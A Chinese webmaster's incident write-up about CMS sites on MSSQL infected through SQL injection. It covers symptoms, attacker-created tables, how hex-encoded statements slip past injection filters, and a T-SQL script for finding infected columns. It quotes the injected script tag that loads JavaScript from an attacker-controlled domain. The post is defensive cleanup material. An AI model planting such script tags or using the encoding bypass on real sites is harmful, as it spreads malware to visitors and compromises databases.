网站被黑kill_kk/xiaolu/daxia123.cn挂马解决办法与原因

------------------------------------------------------------

网站被黑kill_kk/xiaolu/daxia123.cn挂马解决办法与原因

客户站，出现生成不了，被挂马。谈不上解决，只找到原因
现状：
各CMS系统无法生成，但是其它操作正常。生成时一般提示“<' 附近有语法错”和“路径参数超过了最大允许长度。”
受影响对象：采用MSSQL数据库的网站
症状内容：在多个表当中出现挂马代码，如<Script Src=http://cn.daxia123.cn/cn.js> </Script>
　　　　　数据库出现新增表：如kill_kk表，xiaolu表
分析如下：
　　kill_kk表为入侵者读取网站根目录的工具，被入侵网站的根目录下所有的文件夹与文件名都保存在此。
　　xiaolu表：只有一个字段CMD，二进制位。原因不详。
　　多个表中的字段内出现挂马内容，字段多为vchar,字段长度大于100，
被攻击原因如下：
　　攻击者将攻击代码用2进制，或10或10进制编译成了类似于这样的代码：0x4445434C415245204054205641524348415228323535292C404 放sql注入的代码不能检测出来，但是sql server 会把这样的代码在解释成原来的样子
这样就绕过了sql防注入代码。
　　但是，这个代码仅对能解释它的sql server这样的数据库有效，针对access这样的不能解释它的数据库类型攻击无效。
希望微软尽快发补丁。
临时清除办法：
1、批量查找哪些表被挂马了，这一步对大站多表很有用

declare   @str   varchar(100)  
set   @str='daxia123'  //这地方放你所被挂马的关键字；
    
declare   @s   varchar(8000)  
declare   tb   cursor   local   for  
select   s='if   exists(select   1   from   ['+b.name+']   where   ['+a.name+']   like    % +@str+ %)  
    print   ''所在的表及字段:   ['+b.name+'].['+a.name+']'''  
from   syscolumns   a   join   sysobjects   b   on   a.id=b.id  
where   b.xtype='U'   and   a.status>=0  
    and   a.xusertype   in(175,239,231,167)  
open   tb  
fetch   next   from   tb   into   @s  
while   @@fetch_status=0  
begin  
    exec(@s)  
    fetch   next   from   tb   into   @s  
end  
close   tb  
deallocate   tb

代码执行完，会提示哪些表中招了。
你再去清除相关字段内容。

临时解决办法：
查找所有vchar型且字段长度比较大的字段，尽量改小长度。
再通过判断post值的长度来临时解决